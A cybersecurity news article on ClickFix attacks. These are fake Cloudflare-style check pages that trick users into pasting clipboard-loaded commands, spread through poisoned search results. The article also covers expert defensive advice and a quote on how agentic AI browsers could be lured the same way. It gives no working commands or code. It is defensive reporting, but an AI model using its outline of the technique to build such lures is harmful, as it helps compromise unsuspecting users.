ClickFix attacks have exploded over the last year, evolving into one of the most effective forms of social engineering seen in the wild. By convincing users to copy and run malicious code on their own devices, bad actors have turned one of the oldest trust mechanisms in computing (copy-and-paste) into a weapon.
At Push Security’s recent threat briefing in London, researchers showcased the most sophisticated ClickFix page observed to date. It’s a glimpse into how fast these attacks are developing, and how far they’ve come from crude proof-of-concepts just a year ago.
A New Level of Deception
The standout example was a Cloudflare-themed lure that could easily fool even the most cautious users. The page looks legitimate, a near-perfect imitation of a Cloudflare bot-check page, complete with an embedded instructional video, a live countdown timer, and a counter showing “verified users in the last hour.” Every detail is designed to amplify authenticity and urgency.
Behind the slick design, the code is equally advanced. The page automatically adapts to the visitor’s device (serving tailored instructions for Mac users) and quietly copies malicious code to the clipboard through JavaScript. The victim believes they’re fixing a connection issue, but in reality, they’re launching a compromise.
For years, awareness campaigns have told users not to click suspicious links or download random files. But few have been trained to question what happens when a trusted webpage asks them to open a terminal and paste in a command. That’s what makes ClickFix so effective: it hijacks muscle memory, not just judgment.
Beyond Email: The New Delivery Frontier
Unlike most phishing campaigns, the majority of ClickFix attacks aren’t coming through email at all. Push Security’s research shows that four in five intercepted ClickFix pages were reached via Google Search, through poisoned results and malicious advertising.
Attackers are either compromising legitimate sites through hosting or CMS flaws or spinning up their own SEO-optimized clones. This shift away from email exploits a glaring blind spot in most security stacks. If your detection logic lives in the inbox, you’re already too late.
Even when ClickFix pages are delivered by email, they’re hard to detect. Attackers rotate domains, use bot protection to block scanners, and obfuscate code to evade signatures. And because the malicious action happens inside the browser sandbox, traditional monitoring tools can’t see it.
By the time endpoint protection gets involved, the user has already done the damage.
Payloads That Push Boundaries
ClickFix isn’t just evolving in delivery and design. Its payloads are diversifying, too. While PowerShell and mshta remain common, attackers are now abusing a broader range of legitimate binaries across operating systems.
One emerging technique, known as cache smuggling, takes this even further. By caching a disguised file locally, attackers can execute malicious code without ever making a visible web request, effectively pulling malware onto the device under the radar of most network defenses.
The logical next step? ClickFix campaigns that run entirely inside the browser, bypassing endpoint detection and response (EDR) tools altogether.
The Numbers Tell the Story
The 2025 Microsoft Digital Defense Report revealed that ClickFix accounted for 47% of initial access attempts last year, nearly half of all observed attacks. For an attack technique that barely registered two years ago, that’s a seismic shift.
The reason is simple: ClickFix collapses multiple stages of the kill chain into one. A single copy-and-paste action gives attackers the same level of access that once required a phishing link, a download, and a social engineering hook.
The Real Risk: A Single Point of Failure
For many organizations, EDR is now the only thing standing between a ClickFix attack and a full compromise. But EDR can’t be everywhere, particularly in environments where contractors and employees use unmanaged BYOD devices. When that final layer fails or misclassifies an alert, the attack slips through unnoticed.
ClickFix is a shift in how social engineering works, from tricking users into giving up credentials to tricking them into executing commands. And as long as browsers and operating systems allow clipboard interactions by default, attackers will keep exploiting that trust boundary.
Implications for Agentic AI
Lionel Litty, CISO and Chief Security Architect at Menlo Security, says it’s interesting that there is the potential that 80% of ClickFix attacks trace back to poisoned Google search results.
“What’s really noteworthy is the implication for agentic AI. Agentic AI browsers (such as ChatGPT Atlas, Perplexity Comet, and standalone agents as well) are also liable to encounter this type of malicious prompt when performing tasks that involve visiting content found via Google searches. While these agents typically lack the ability to run commands, they can still be tricked into causing damage in many other ways, all while staying within the confines of the browser. It would not be surprising to see these attacks evolve to also target agents, just as we are seeing here that they have evolved to target multiple operating systems.”
Defense in Depth
James Maude, Field CTO at BeyondTrust, adds that the most modern cyber-attacks can be mitigated by the oldest of controls, least privilege and application control. “While EDRs can provide a line of reactive protection, this should be combined with the proactive protection of removing admin privileges and controlling application execution as part of a defense-in-depth approach. The fewer privileges the victim has, the lower the risk to the organization. If you can layer application control on top of that to prevent threat actors from downloading and launching malicious tools, that further reduces the risk.”
The reduction of privileges doesn’t just apply to the endpoint as these types of malware are often harvesting credentials and session tokens for cloud and SaaS services, Maude says. “This means that any standing privilege that the user has on their endpoint, or in the cloud, could be exploited and used against them and their organization.”
Getting Users to Compromise Themselves
“All social engineering comes down to getting users to compromise themselves, and as attackers have to rely on more sophisticated methods beyond the grasp of typical users, they need to make it as simple as possible,” ends John Bambenek, President at Bambenek Consulting. “Explainer videos are a logical next step, especially given they are trivial to create with generative AI now.”
Information Security Buzz News Editor
Kirsten Doyle has been in the technology journalism and editing space for nearly 24 years, during which time she has developed a great love for all aspects of technology, as well as words themselves. Her experience spans B2B tech, with a lot of focus on cybersecurity, cloud, enterprise, digital transformation, and data centre. Her specialties are in news, thought leadership, features, white papers, and PR writing, and she is an experienced editor for both print and online publications.
The opinions expressed in this post belong to the individual contributors and do not necessarily reflect the views of Information Security Buzz.